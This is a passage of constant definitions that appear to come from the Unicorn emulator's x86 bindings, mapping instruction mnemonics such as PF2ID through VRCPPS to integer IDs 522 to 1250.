UC_X86_INS_PF2ID = 522 UC_X86_INS_PF2IW = 523 UC_X86_INS_PFACC = 524 UC_X86_INS_PFADD = 525 UC_X86_INS_PFCMPEQ = 526 UC_X86_INS_PFCMPGE = 527 UC_X86_INS_PFCMPGT = 528 UC_X86_INS_PFMAX = 529 UC_X86_INS_PFMIN = 530 UC_X86_INS_PFMUL = 531 UC_X86_INS_PFNACC = 532 UC_X86_INS_PFPNACC = 533 UC_X86_INS_PFRCPIT1 = 534 UC_X86_INS_PFRCPIT2 = 535 UC_X86_INS_PFRCP = 536 UC_X86_INS_PFRSQIT1 = 537 UC_X86_INS_PFRSQRT = 538 UC_X86_INS_PFSUBR = 539 UC_X86_INS_PFSUB = 540 UC_X86_INS_PHMINPOSUW = 541 UC_X86_INS_PI2FD = 542 UC_X86_INS_PI2FW = 543 UC_X86_INS_PINSRB = 544 UC_X86_INS_PINSRD = 545 UC_X86_INS_PINSRQ = 546 UC_X86_INS_PMAXSB = 547 UC_X86_INS_PMAXSD = 548 UC_X86_INS_PMAXUD = 549 UC_X86_INS_PMAXUW = 550 UC_X86_INS_PMINSB = 551 UC_X86_INS_PMINSD = 552 UC_X86_INS_PMINUD = 553 UC_X86_INS_PMINUW = 554 UC_X86_INS_PMOVSXBD = 555 UC_X86_INS_PMOVSXBQ = 556 UC_X86_INS_PMOVSXBW = 557 UC_X86_INS_PMOVSXDQ = 558 UC_X86_INS_PMOVSXWD = 559 UC_X86_INS_PMOVSXWQ = 560 UC_X86_INS_PMOVZXBD = 561 UC_X86_INS_PMOVZXBQ = 562 UC_X86_INS_PMOVZXBW = 563 UC_X86_INS_PMOVZXDQ = 564 UC_X86_INS_PMOVZXWD = 565 UC_X86_INS_PMOVZXWQ = 566 UC_X86_INS_PMULDQ = 567 UC_X86_INS_PMULHRW = 568 UC_X86_INS_PMULLD = 569 UC_X86_INS_POP = 570 UC_X86_INS_POPAW = 571 UC_X86_INS_POPAL = 572 UC_X86_INS_POPCNT = 573 UC_X86_INS_POPF = 574 UC_X86_INS_POPFD = 575 UC_X86_INS_POPFQ = 576 UC_X86_INS_PREFETCH = 577 UC_X86_INS_PREFETCHNTA = 578 UC_X86_INS_PREFETCHT0 = 579 UC_X86_INS_PREFETCHT1 = 580 UC_X86_INS_PREFETCHT2 = 581 UC_X86_INS_PREFETCHW = 582 UC_X86_INS_PSHUFD = 583 UC_X86_INS_PSHUFHW = 584 UC_X86_INS_PSHUFLW = 585 UC_X86_INS_PSLLDQ = 586 UC_X86_INS_PSRLDQ = 587 UC_X86_INS_PSWAPD = 588 UC_X86_INS_PTEST = 589 UC_X86_INS_PUNPCKHQDQ = 590 UC_X86_INS_PUNPCKLQDQ = 591 UC_X86_INS_PUSH = 592 UC_X86_INS_PUSHAW = 593 UC_X86_INS_PUSHAL = 594 UC_X86_INS_PUSHF = 595 UC_X86_INS_PUSHFD = 596 UC_X86_INS_PUSHFQ = 597 UC_X86_INS_RCL = 598 UC_X86_INS_RCPPS = 599 UC_X86_INS_RCPSS = 600 UC_X86_INS_RCR = 601 UC_X86_INS_RDFSBASE = 602 UC_X86_INS_RDGSBASE = 603 UC_X86_INS_RDMSR = 604 UC_X86_INS_RDPMC = 605 UC_X86_INS_RDRAND = 606 UC_X86_INS_RDSEED = 607 UC_X86_INS_RDTSC = 608 UC_X86_INS_RDTSCP = 609 UC_X86_INS_ROL = 610 UC_X86_INS_ROR = 611 UC_X86_INS_RORX = 612 UC_X86_INS_ROUNDPD = 613 UC_X86_INS_ROUNDPS = 614 UC_X86_INS_ROUNDSD = 615 UC_X86_INS_ROUNDSS = 616 UC_X86_INS_RSM = 617 UC_X86_INS_RSQRTPS = 618 UC_X86_INS_RSQRTSS = 619 UC_X86_INS_SAHF = 620 UC_X86_INS_SAL = 621 UC_X86_INS_SALC = 622 UC_X86_INS_SAR = 623 UC_X86_INS_SARX = 624 UC_X86_INS_SBB = 625 UC_X86_INS_SCASB = 626 UC_X86_INS_SCASD = 627 UC_X86_INS_SCASQ = 628 UC_X86_INS_SCASW = 629 UC_X86_INS_SETAE = 630 UC_X86_INS_SETA = 631 UC_X86_INS_SETBE = 632 UC_X86_INS_SETB = 633 UC_X86_INS_SETE = 634 UC_X86_INS_SETGE = 635 UC_X86_INS_SETG = 636 UC_X86_INS_SETLE = 637 UC_X86_INS_SETL = 638 UC_X86_INS_SETNE = 639 UC_X86_INS_SETNO = 640 UC_X86_INS_SETNP = 641 UC_X86_INS_SETNS = 642 UC_X86_INS_SETO = 643 UC_X86_INS_SETP = 644 UC_X86_INS_SETS = 645 UC_X86_INS_SFENCE = 646 UC_X86_INS_SGDT = 647 UC_X86_INS_SHA1MSG1 = 648 UC_X86_INS_SHA1MSG2 = 649 UC_X86_INS_SHA1NEXTE = 650 UC_X86_INS_SHA1RNDS4 = 651 UC_X86_INS_SHA256MSG1 = 652 UC_X86_INS_SHA256MSG2 = 653 UC_X86_INS_SHA256RNDS2 = 654 UC_X86_INS_SHL = 655 UC_X86_INS_SHLD = 656 UC_X86_INS_SHLX = 657 UC_X86_INS_SHR = 658 UC_X86_INS_SHRD = 659 UC_X86_INS_SHRX = 660 UC_X86_INS_SHUFPD = 661 UC_X86_INS_SHUFPS = 662 UC_X86_INS_SIDT = 663 UC_X86_INS_FSIN = 664 UC_X86_INS_SKINIT = 665 UC_X86_INS_SLDT = 666 UC_X86_INS_SMSW = 667 UC_X86_INS_SQRTPD = 668 UC_X86_INS_SQRTPS = 669 UC_X86_INS_SQRTSD = 670 UC_X86_INS_SQRTSS = 671 UC_X86_INS_FSQRT = 672 UC_X86_INS_STAC = 673 UC_X86_INS_STC = 674 UC_X86_INS_STD = 675 UC_X86_INS_STGI = 676 UC_X86_INS_STI = 677 UC_X86_INS_STMXCSR = 678 UC_X86_INS_STOSB = 679 UC_X86_INS_STOSD = 680 UC_X86_INS_STOSQ = 681 UC_X86_INS_STOSW = 682 UC_X86_INS_STR = 683 UC_X86_INS_FST = 684 UC_X86_INS_FSTP = 685 UC_X86_INS_FSTPNCE = 686 UC_X86_INS_FXCH = 687 UC_X86_INS_SUBPD = 688 UC_X86_INS_SUBPS = 689 UC_X86_INS_FSUBR = 690 UC_X86_INS_FISUBR = 691 UC_X86_INS_FSUBRP = 692 UC_X86_INS_SUBSD = 693 UC_X86_INS_SUBSS = 694 UC_X86_INS_FSUB = 695 UC_X86_INS_FISUB = 696 UC_X86_INS_FSUBP = 697 UC_X86_INS_SWAPGS = 698 UC_X86_INS_SYSCALL = 699 UC_X86_INS_SYSENTER = 700 UC_X86_INS_SYSEXIT = 701 UC_X86_INS_SYSRET = 702 UC_X86_INS_T1MSKC = 703 UC_X86_INS_TEST = 704 UC_X86_INS_UD2 = 705 UC_X86_INS_FTST = 706 UC_X86_INS_TZCNT = 707 UC_X86_INS_TZMSK = 708 UC_X86_INS_FUCOMPI = 709 UC_X86_INS_FUCOMI = 710 UC_X86_INS_FUCOMPP = 711 UC_X86_INS_FUCOMP = 712 UC_X86_INS_FUCOM = 713 UC_X86_INS_UD2B = 714 UC_X86_INS_UNPCKHPD = 715 UC_X86_INS_UNPCKHPS = 716 UC_X86_INS_UNPCKLPD = 717 UC_X86_INS_UNPCKLPS = 718 UC_X86_INS_VADDPD = 719 UC_X86_INS_VADDPS = 720 UC_X86_INS_VADDSD = 721 UC_X86_INS_VADDSS = 722 UC_X86_INS_VADDSUBPD = 723 UC_X86_INS_VADDSUBPS = 724 UC_X86_INS_VAESDECLAST = 725 UC_X86_INS_VAESDEC = 726 UC_X86_INS_VAESENCLAST = 727 UC_X86_INS_VAESENC = 728 UC_X86_INS_VAESIMC = 729 UC_X86_INS_VAESKEYGENASSIST = 730 UC_X86_INS_VALIGND = 731 UC_X86_INS_VALIGNQ = 732 UC_X86_INS_VANDNPD = 733 UC_X86_INS_VANDNPS = 734 UC_X86_INS_VANDPD = 735 UC_X86_INS_VANDPS = 736 UC_X86_INS_VBLENDMPD = 737 UC_X86_INS_VBLENDMPS = 738 UC_X86_INS_VBLENDPD = 739 UC_X86_INS_VBLENDPS = 740 UC_X86_INS_VBLENDVPD = 741 UC_X86_INS_VBLENDVPS = 742 UC_X86_INS_VBROADCASTF128 = 743 UC_X86_INS_VBROADCASTI32X4 = 744 UC_X86_INS_VBROADCASTI64X4 = 745 UC_X86_INS_VBROADCASTSD = 746 UC_X86_INS_VBROADCASTSS = 747 UC_X86_INS_VCMPPD = 748 UC_X86_INS_VCMPPS = 749 UC_X86_INS_VCMPSD = 750 UC_X86_INS_VCMPSS = 751 UC_X86_INS_VCOMPRESSPD = 752 UC_X86_INS_VCOMPRESSPS = 753 UC_X86_INS_VCVTDQ2PD = 754 UC_X86_INS_VCVTDQ2PS = 755 UC_X86_INS_VCVTPD2DQX = 756 UC_X86_INS_VCVTPD2DQ = 757 UC_X86_INS_VCVTPD2PSX = 758 UC_X86_INS_VCVTPD2PS = 759 UC_X86_INS_VCVTPD2UDQ = 760 UC_X86_INS_VCVTPH2PS = 761 UC_X86_INS_VCVTPS2DQ = 762 UC_X86_INS_VCVTPS2PD = 763 UC_X86_INS_VCVTPS2PH = 764 UC_X86_INS_VCVTPS2UDQ = 765 UC_X86_INS_VCVTSD2SI = 766 UC_X86_INS_VCVTSD2USI = 767 UC_X86_INS_VCVTSS2SI = 768 UC_X86_INS_VCVTSS2USI = 769 UC_X86_INS_VCVTTPD2DQX = 770 UC_X86_INS_VCVTTPD2DQ = 771 UC_X86_INS_VCVTTPD2UDQ = 772 UC_X86_INS_VCVTTPS2DQ = 773 UC_X86_INS_VCVTTPS2UDQ = 774 UC_X86_INS_VCVTUDQ2PD = 775 UC_X86_INS_VCVTUDQ2PS = 776 UC_X86_INS_VDIVPD = 777 UC_X86_INS_VDIVPS = 778 UC_X86_INS_VDIVSD = 779 UC_X86_INS_VDIVSS = 780 UC_X86_INS_VDPPD = 781 UC_X86_INS_VDPPS = 782 UC_X86_INS_VERR = 783 UC_X86_INS_VERW = 784 UC_X86_INS_VEXP2PD = 785 UC_X86_INS_VEXP2PS = 786 UC_X86_INS_VEXPANDPD = 787 UC_X86_INS_VEXPANDPS = 788 UC_X86_INS_VEXTRACTF128 = 789 UC_X86_INS_VEXTRACTF32X4 = 790 UC_X86_INS_VEXTRACTF64X4 = 791 UC_X86_INS_VEXTRACTI128 = 792 UC_X86_INS_VEXTRACTI32X4 = 793 UC_X86_INS_VEXTRACTI64X4 = 794 UC_X86_INS_VEXTRACTPS = 795 UC_X86_INS_VFMADD132PD = 796 UC_X86_INS_VFMADD132PS = 797 UC_X86_INS_VFMADDPD = 798 UC_X86_INS_VFMADD213PD = 799 UC_X86_INS_VFMADD231PD = 800 UC_X86_INS_VFMADDPS = 801 UC_X86_INS_VFMADD213PS = 802 UC_X86_INS_VFMADD231PS = 803 UC_X86_INS_VFMADDSD = 804 UC_X86_INS_VFMADD213SD = 805 UC_X86_INS_VFMADD132SD = 806 UC_X86_INS_VFMADD231SD = 807 UC_X86_INS_VFMADDSS = 808 UC_X86_INS_VFMADD213SS = 809 UC_X86_INS_VFMADD132SS = 810 UC_X86_INS_VFMADD231SS = 811 UC_X86_INS_VFMADDSUB132PD = 812 UC_X86_INS_VFMADDSUB132PS = 813 UC_X86_INS_VFMADDSUBPD = 814 UC_X86_INS_VFMADDSUB213PD = 815 UC_X86_INS_VFMADDSUB231PD = 816 UC_X86_INS_VFMADDSUBPS = 817 UC_X86_INS_VFMADDSUB213PS = 818 UC_X86_INS_VFMADDSUB231PS = 819 UC_X86_INS_VFMSUB132PD = 820 UC_X86_INS_VFMSUB132PS = 821 UC_X86_INS_VFMSUBADD132PD = 822 UC_X86_INS_VFMSUBADD132PS = 823 UC_X86_INS_VFMSUBADDPD = 824 UC_X86_INS_VFMSUBADD213PD = 825 UC_X86_INS_VFMSUBADD231PD = 826 UC_X86_INS_VFMSUBADDPS = 827 UC_X86_INS_VFMSUBADD213PS = 828 UC_X86_INS_VFMSUBADD231PS = 829 UC_X86_INS_VFMSUBPD = 830 UC_X86_INS_VFMSUB213PD = 831 UC_X86_INS_VFMSUB231PD = 832 UC_X86_INS_VFMSUBPS = 833 UC_X86_INS_VFMSUB213PS = 834 UC_X86_INS_VFMSUB231PS = 835 UC_X86_INS_VFMSUBSD = 836 UC_X86_INS_VFMSUB213SD = 837 UC_X86_INS_VFMSUB132SD = 838 UC_X86_INS_VFMSUB231SD = 839 UC_X86_INS_VFMSUBSS = 840 UC_X86_INS_VFMSUB213SS = 841 UC_X86_INS_VFMSUB132SS = 842 UC_X86_INS_VFMSUB231SS = 843 UC_X86_INS_VFNMADD132PD = 844 UC_X86_INS_VFNMADD132PS = 845 UC_X86_INS_VFNMADDPD = 846 UC_X86_INS_VFNMADD213PD = 847 UC_X86_INS_VFNMADD231PD = 848 UC_X86_INS_VFNMADDPS = 849 UC_X86_INS_VFNMADD213PS = 850 UC_X86_INS_VFNMADD231PS = 851 UC_X86_INS_VFNMADDSD = 852 UC_X86_INS_VFNMADD213SD = 853 UC_X86_INS_VFNMADD132SD = 854 UC_X86_INS_VFNMADD231SD = 855 UC_X86_INS_VFNMADDSS = 856 UC_X86_INS_VFNMADD213SS = 857 UC_X86_INS_VFNMADD132SS = 858 UC_X86_INS_VFNMADD231SS = 859 UC_X86_INS_VFNMSUB132PD = 860 UC_X86_INS_VFNMSUB132PS = 861 UC_X86_INS_VFNMSUBPD = 862 UC_X86_INS_VFNMSUB213PD = 863 UC_X86_INS_VFNMSUB231PD = 864 UC_X86_INS_VFNMSUBPS = 865 UC_X86_INS_VFNMSUB213PS = 866 UC_X86_INS_VFNMSUB231PS = 867 UC_X86_INS_VFNMSUBSD = 868 UC_X86_INS_VFNMSUB213SD = 869 UC_X86_INS_VFNMSUB132SD = 870 UC_X86_INS_VFNMSUB231SD = 871 UC_X86_INS_VFNMSUBSS = 872 UC_X86_INS_VFNMSUB213SS = 873 UC_X86_INS_VFNMSUB132SS = 874 UC_X86_INS_VFNMSUB231SS = 875 UC_X86_INS_VFRCZPD = 876 UC_X86_INS_VFRCZPS = 877 UC_X86_INS_VFRCZSD = 878 UC_X86_INS_VFRCZSS = 879 UC_X86_INS_VORPD = 880 UC_X86_INS_VORPS = 881 UC_X86_INS_VXORPD = 882 UC_X86_INS_VXORPS = 883 UC_X86_INS_VGATHERDPD = 884 UC_X86_INS_VGATHERDPS = 885 UC_X86_INS_VGATHERPF0DPD = 886 UC_X86_INS_VGATHERPF0DPS = 887 UC_X86_INS_VGATHERPF0QPD = 888 UC_X86_INS_VGATHERPF0QPS = 889 UC_X86_INS_VGATHERPF1DPD = 890 UC_X86_INS_VGATHERPF1DPS = 891 UC_X86_INS_VGATHERPF1QPD = 892 UC_X86_INS_VGATHERPF1QPS = 893 UC_X86_INS_VGATHERQPD = 894 UC_X86_INS_VGATHERQPS = 895 UC_X86_INS_VHADDPD = 896 UC_X86_INS_VHADDPS = 897 UC_X86_INS_VHSUBPD = 898 UC_X86_INS_VHSUBPS = 899 UC_X86_INS_VINSERTF128 = 900 UC_X86_INS_VINSERTF32X4 = 901 UC_X86_INS_VINSERTF32X8 = 902 UC_X86_INS_VINSERTF64X2 = 903 UC_X86_INS_VINSERTF64X4 = 904 UC_X86_INS_VINSERTI128 = 905 UC_X86_INS_VINSERTI32X4 = 906 UC_X86_INS_VINSERTI32X8 = 907 UC_X86_INS_VINSERTI64X2 = 908 UC_X86_INS_VINSERTI64X4 = 909 UC_X86_INS_VINSERTPS = 910 UC_X86_INS_VLDDQU = 911 UC_X86_INS_VLDMXCSR = 912 UC_X86_INS_VMASKMOVDQU = 913 UC_X86_INS_VMASKMOVPD = 914 UC_X86_INS_VMASKMOVPS = 915 UC_X86_INS_VMAXPD = 916 UC_X86_INS_VMAXPS = 917 UC_X86_INS_VMAXSD = 918 UC_X86_INS_VMAXSS = 919 UC_X86_INS_VMCALL = 920 UC_X86_INS_VMCLEAR = 921 UC_X86_INS_VMFUNC = 922 UC_X86_INS_VMINPD = 923 UC_X86_INS_VMINPS = 924 UC_X86_INS_VMINSD = 925 UC_X86_INS_VMINSS = 926 UC_X86_INS_VMLAUNCH = 927 UC_X86_INS_VMLOAD = 928 UC_X86_INS_VMMCALL = 929 UC_X86_INS_VMOVQ = 930 UC_X86_INS_VMOVDDUP = 931 UC_X86_INS_VMOVD = 932 UC_X86_INS_VMOVDQA32 = 933 UC_X86_INS_VMOVDQA64 = 934 UC_X86_INS_VMOVDQA = 935 UC_X86_INS_VMOVDQU16 = 936 UC_X86_INS_VMOVDQU32 = 937 UC_X86_INS_VMOVDQU64 = 938 UC_X86_INS_VMOVDQU8 = 939 UC_X86_INS_VMOVDQU = 940 UC_X86_INS_VMOVHLPS = 941 UC_X86_INS_VMOVHPD = 942 UC_X86_INS_VMOVHPS = 943 UC_X86_INS_VMOVLHPS = 944 UC_X86_INS_VMOVLPD = 945 UC_X86_INS_VMOVLPS = 946 UC_X86_INS_VMOVMSKPD = 947 UC_X86_INS_VMOVMSKPS = 948 UC_X86_INS_VMOVNTDQA = 949 UC_X86_INS_VMOVNTDQ = 950 UC_X86_INS_VMOVNTPD = 951 UC_X86_INS_VMOVNTPS = 952 UC_X86_INS_VMOVSD = 953 UC_X86_INS_VMOVSHDUP = 954 UC_X86_INS_VMOVSLDUP = 955 UC_X86_INS_VMOVSS = 956 UC_X86_INS_VMOVUPD = 957 UC_X86_INS_VMOVUPS = 958 UC_X86_INS_VMPSADBW = 959 UC_X86_INS_VMPTRLD = 960 UC_X86_INS_VMPTRST = 961 UC_X86_INS_VMREAD = 962 UC_X86_INS_VMRESUME = 963 UC_X86_INS_VMRUN = 964 UC_X86_INS_VMSAVE = 965 UC_X86_INS_VMULPD = 966 UC_X86_INS_VMULPS = 967 UC_X86_INS_VMULSD = 968 UC_X86_INS_VMULSS = 969 UC_X86_INS_VMWRITE = 970 UC_X86_INS_VMXOFF = 971 UC_X86_INS_VMXON = 972 UC_X86_INS_VPABSB = 973 UC_X86_INS_VPABSD = 974 UC_X86_INS_VPABSQ = 975 UC_X86_INS_VPABSW = 976 UC_X86_INS_VPACKSSDW = 977 UC_X86_INS_VPACKSSWB = 978 UC_X86_INS_VPACKUSDW = 979 UC_X86_INS_VPACKUSWB = 980 UC_X86_INS_VPADDB = 981 UC_X86_INS_VPADDD = 982 UC_X86_INS_VPADDQ = 983 UC_X86_INS_VPADDSB = 984 UC_X86_INS_VPADDSW = 985 UC_X86_INS_VPADDUSB = 986 UC_X86_INS_VPADDUSW = 987 UC_X86_INS_VPADDW = 988 UC_X86_INS_VPALIGNR = 989 UC_X86_INS_VPANDD = 990 UC_X86_INS_VPANDND = 991 UC_X86_INS_VPANDNQ = 992 UC_X86_INS_VPANDN = 993 UC_X86_INS_VPANDQ = 994 UC_X86_INS_VPAND = 995 UC_X86_INS_VPAVGB = 996 UC_X86_INS_VPAVGW = 997 UC_X86_INS_VPBLENDD = 998 UC_X86_INS_VPBLENDMB = 999 UC_X86_INS_VPBLENDMD = 1000 UC_X86_INS_VPBLENDMQ = 1001 UC_X86_INS_VPBLENDMW = 1002 UC_X86_INS_VPBLENDVB = 1003 UC_X86_INS_VPBLENDW = 1004 UC_X86_INS_VPBROADCASTB = 1005 UC_X86_INS_VPBROADCASTD = 1006 UC_X86_INS_VPBROADCASTMB2Q = 1007 UC_X86_INS_VPBROADCASTMW2D = 1008 UC_X86_INS_VPBROADCASTQ = 1009 UC_X86_INS_VPBROADCASTW = 1010 UC_X86_INS_VPCLMULQDQ = 1011 UC_X86_INS_VPCMOV = 1012 UC_X86_INS_VPCMPB = 1013 UC_X86_INS_VPCMPD = 1014 UC_X86_INS_VPCMPEQB = 1015 UC_X86_INS_VPCMPEQD = 1016 UC_X86_INS_VPCMPEQQ = 1017 UC_X86_INS_VPCMPEQW = 1018 UC_X86_INS_VPCMPESTRI = 1019 UC_X86_INS_VPCMPESTRM = 1020 UC_X86_INS_VPCMPGTB = 1021 UC_X86_INS_VPCMPGTD = 1022 UC_X86_INS_VPCMPGTQ = 1023 UC_X86_INS_VPCMPGTW = 1024 UC_X86_INS_VPCMPISTRI = 1025 UC_X86_INS_VPCMPISTRM = 1026 UC_X86_INS_VPCMPQ = 1027 UC_X86_INS_VPCMPUB = 1028 UC_X86_INS_VPCMPUD = 1029 UC_X86_INS_VPCMPUQ = 1030 UC_X86_INS_VPCMPUW = 1031 UC_X86_INS_VPCMPW = 1032 UC_X86_INS_VPCOMB = 1033 UC_X86_INS_VPCOMD = 1034 UC_X86_INS_VPCOMPRESSD = 1035 UC_X86_INS_VPCOMPRESSQ = 1036 UC_X86_INS_VPCOMQ = 1037 UC_X86_INS_VPCOMUB = 1038 UC_X86_INS_VPCOMUD = 1039 UC_X86_INS_VPCOMUQ = 1040 UC_X86_INS_VPCOMUW = 1041 UC_X86_INS_VPCOMW = 1042 UC_X86_INS_VPCONFLICTD = 1043 UC_X86_INS_VPCONFLICTQ = 1044 UC_X86_INS_VPERM2F128 = 1045 UC_X86_INS_VPERM2I128 = 1046 UC_X86_INS_VPERMD = 1047 UC_X86_INS_VPERMI2D = 1048 UC_X86_INS_VPERMI2PD = 1049 UC_X86_INS_VPERMI2PS = 1050 UC_X86_INS_VPERMI2Q = 1051 UC_X86_INS_VPERMIL2PD = 1052 UC_X86_INS_VPERMIL2PS = 1053 UC_X86_INS_VPERMILPD = 1054 UC_X86_INS_VPERMILPS = 1055 UC_X86_INS_VPERMPD = 1056 UC_X86_INS_VPERMPS = 1057 UC_X86_INS_VPERMQ = 1058 UC_X86_INS_VPERMT2D = 1059 UC_X86_INS_VPERMT2PD = 1060 UC_X86_INS_VPERMT2PS = 1061 UC_X86_INS_VPERMT2Q = 1062 UC_X86_INS_VPEXPANDD = 1063 UC_X86_INS_VPEXPANDQ = 1064 UC_X86_INS_VPEXTRB = 1065 UC_X86_INS_VPEXTRD = 1066 UC_X86_INS_VPEXTRQ = 1067 UC_X86_INS_VPEXTRW = 1068 UC_X86_INS_VPGATHERDD = 1069 UC_X86_INS_VPGATHERDQ = 1070 UC_X86_INS_VPGATHERQD = 1071 UC_X86_INS_VPGATHERQQ = 1072 UC_X86_INS_VPHADDBD = 1073 UC_X86_INS_VPHADDBQ = 1074 UC_X86_INS_VPHADDBW = 1075 UC_X86_INS_VPHADDDQ = 1076 UC_X86_INS_VPHADDD = 1077 UC_X86_INS_VPHADDSW = 1078 UC_X86_INS_VPHADDUBD = 1079 UC_X86_INS_VPHADDUBQ = 1080 UC_X86_INS_VPHADDUBW = 1081 UC_X86_INS_VPHADDUDQ = 1082 UC_X86_INS_VPHADDUWD = 1083 UC_X86_INS_VPHADDUWQ = 1084 UC_X86_INS_VPHADDWD = 1085 UC_X86_INS_VPHADDWQ = 1086 UC_X86_INS_VPHADDW = 1087 UC_X86_INS_VPHMINPOSUW = 1088 UC_X86_INS_VPHSUBBW = 1089 UC_X86_INS_VPHSUBDQ = 1090 UC_X86_INS_VPHSUBD = 1091 UC_X86_INS_VPHSUBSW = 1092 UC_X86_INS_VPHSUBWD = 1093 UC_X86_INS_VPHSUBW = 1094 UC_X86_INS_VPINSRB = 1095 UC_X86_INS_VPINSRD = 1096 UC_X86_INS_VPINSRQ = 1097 UC_X86_INS_VPINSRW = 1098 UC_X86_INS_VPLZCNTD = 1099 UC_X86_INS_VPLZCNTQ = 1100 UC_X86_INS_VPMACSDD = 1101 UC_X86_INS_VPMACSDQH = 1102 UC_X86_INS_VPMACSDQL = 1103 UC_X86_INS_VPMACSSDD = 1104 UC_X86_INS_VPMACSSDQH = 1105 UC_X86_INS_VPMACSSDQL = 1106 UC_X86_INS_VPMACSSWD = 1107 UC_X86_INS_VPMACSSWW = 1108 UC_X86_INS_VPMACSWD = 1109 UC_X86_INS_VPMACSWW = 1110 UC_X86_INS_VPMADCSSWD = 1111 UC_X86_INS_VPMADCSWD = 1112 UC_X86_INS_VPMADDUBSW = 1113 UC_X86_INS_VPMADDWD = 1114 UC_X86_INS_VPMASKMOVD = 1115 UC_X86_INS_VPMASKMOVQ = 1116 UC_X86_INS_VPMAXSB = 1117 UC_X86_INS_VPMAXSD = 1118 UC_X86_INS_VPMAXSQ = 1119 UC_X86_INS_VPMAXSW = 1120 UC_X86_INS_VPMAXUB = 1121 UC_X86_INS_VPMAXUD = 1122 UC_X86_INS_VPMAXUQ = 1123 UC_X86_INS_VPMAXUW = 1124 UC_X86_INS_VPMINSB = 1125 UC_X86_INS_VPMINSD = 1126 UC_X86_INS_VPMINSQ = 1127 UC_X86_INS_VPMINSW = 1128 UC_X86_INS_VPMINUB = 1129 UC_X86_INS_VPMINUD = 1130 UC_X86_INS_VPMINUQ = 1131 UC_X86_INS_VPMINUW = 1132 UC_X86_INS_VPMOVDB = 1133 UC_X86_INS_VPMOVDW = 1134 UC_X86_INS_VPMOVM2B = 1135 UC_X86_INS_VPMOVM2D = 1136 UC_X86_INS_VPMOVM2Q = 1137 UC_X86_INS_VPMOVM2W = 1138 UC_X86_INS_VPMOVMSKB = 1139 UC_X86_INS_VPMOVQB = 1140 UC_X86_INS_VPMOVQD = 1141 UC_X86_INS_VPMOVQW = 1142 UC_X86_INS_VPMOVSDB = 1143 UC_X86_INS_VPMOVSDW = 1144 UC_X86_INS_VPMOVSQB = 1145 UC_X86_INS_VPMOVSQD = 1146 UC_X86_INS_VPMOVSQW = 1147 UC_X86_INS_VPMOVSXBD = 1148 UC_X86_INS_VPMOVSXBQ = 1149 UC_X86_INS_VPMOVSXBW = 1150 UC_X86_INS_VPMOVSXDQ = 1151 UC_X86_INS_VPMOVSXWD = 1152 UC_X86_INS_VPMOVSXWQ = 1153 UC_X86_INS_VPMOVUSDB = 1154 UC_X86_INS_VPMOVUSDW = 1155 UC_X86_INS_VPMOVUSQB = 1156 UC_X86_INS_VPMOVUSQD = 1157 UC_X86_INS_VPMOVUSQW = 1158 UC_X86_INS_VPMOVZXBD = 1159 UC_X86_INS_VPMOVZXBQ = 1160 UC_X86_INS_VPMOVZXBW = 1161 UC_X86_INS_VPMOVZXDQ = 1162 UC_X86_INS_VPMOVZXWD = 1163 UC_X86_INS_VPMOVZXWQ = 1164 UC_X86_INS_VPMULDQ = 1165 UC_X86_INS_VPMULHRSW = 1166 UC_X86_INS_VPMULHUW = 1167 UC_X86_INS_VPMULHW = 1168 UC_X86_INS_VPMULLD = 1169 UC_X86_INS_VPMULLQ = 1170 UC_X86_INS_VPMULLW = 1171 UC_X86_INS_VPMULUDQ = 1172 UC_X86_INS_VPORD = 1173 UC_X86_INS_VPORQ = 1174 UC_X86_INS_VPOR = 1175 UC_X86_INS_VPPERM = 1176 UC_X86_INS_VPROTB = 1177 UC_X86_INS_VPROTD = 1178 UC_X86_INS_VPROTQ = 1179 UC_X86_INS_VPROTW = 1180 UC_X86_INS_VPSADBW = 1181 UC_X86_INS_VPSCATTERDD = 1182 UC_X86_INS_VPSCATTERDQ = 1183 UC_X86_INS_VPSCATTERQD = 1184 UC_X86_INS_VPSCATTERQQ = 1185 UC_X86_INS_VPSHAB = 1186 UC_X86_INS_VPSHAD = 1187 UC_X86_INS_VPSHAQ = 1188 UC_X86_INS_VPSHAW = 1189 UC_X86_INS_VPSHLB = 1190 UC_X86_INS_VPSHLD = 1191 UC_X86_INS_VPSHLQ = 1192 UC_X86_INS_VPSHLW = 1193 UC_X86_INS_VPSHUFB = 1194 UC_X86_INS_VPSHUFD = 1195 UC_X86_INS_VPSHUFHW = 1196 UC_X86_INS_VPSHUFLW = 1197 UC_X86_INS_VPSIGNB = 1198 UC_X86_INS_VPSIGND = 1199 UC_X86_INS_VPSIGNW = 1200 UC_X86_INS_VPSLLDQ = 1201 UC_X86_INS_VPSLLD = 1202 UC_X86_INS_VPSLLQ = 1203 UC_X86_INS_VPSLLVD = 1204 UC_X86_INS_VPSLLVQ = 1205 UC_X86_INS_VPSLLW = 1206 UC_X86_INS_VPSRAD = 1207 UC_X86_INS_VPSRAQ = 1208 UC_X86_INS_VPSRAVD = 1209 UC_X86_INS_VPSRAVQ = 1210 UC_X86_INS_VPSRAW = 1211 UC_X86_INS_VPSRLDQ = 1212 UC_X86_INS_VPSRLD = 1213 UC_X86_INS_VPSRLQ = 1214 UC_X86_INS_VPSRLVD = 1215 UC_X86_INS_VPSRLVQ = 1216 UC_X86_INS_VPSRLW = 1217 UC_X86_INS_VPSUBB = 1218 UC_X86_INS_VPSUBD = 1219 UC_X86_INS_VPSUBQ = 1220 UC_X86_INS_VPSUBSB = 1221 UC_X86_INS_VPSUBSW = 1222 UC_X86_INS_VPSUBUSB = 1223 UC_X86_INS_VPSUBUSW = 1224 UC_X86_INS_VPSUBW = 1225 UC_X86_INS_VPTESTMD = 1226 UC_X86_INS_VPTESTMQ = 1227 UC_X86_INS_VPTESTNMD = 1228 UC_X86_INS_VPTESTNMQ = 1229 UC_X86_INS_VPTEST = 1230 UC_X86_INS_VPUNPCKHBW = 1231 UC_X86_INS_VPUNPCKHDQ = 1232 UC_X86_INS_VPUNPCKHQDQ = 1233 UC_X86_INS_VPUNPCKHWD = 1234 UC_X86_INS_VPUNPCKLBW = 1235 UC_X86_INS_VPUNPCKLDQ = 1236 UC_X86_INS_VPUNPCKLQDQ = 1237 UC_X86_INS_VPUNPCKLWD = 1238 UC_X86_INS_VPXORD = 1239 UC_X86_INS_VPXORQ = 1240 UC_X86_INS_VPXOR = 1241 UC_X86_INS_VRCP14PD = 1242 UC_X86_INS_VRCP14PS = 1243 UC_X86_INS_VRCP14SD = 1244 UC_X86_INS_VRCP14SS = 1245 UC_X86_INS_VRCP28PD = 1246 UC_X86_INS_VRCP28PS = 1247 UC_X86_INS_VRCP28SD = 1248 UC_X86_INS_VRCP28SS = 1249 UC_X86_INS_VRCPPS = 1250 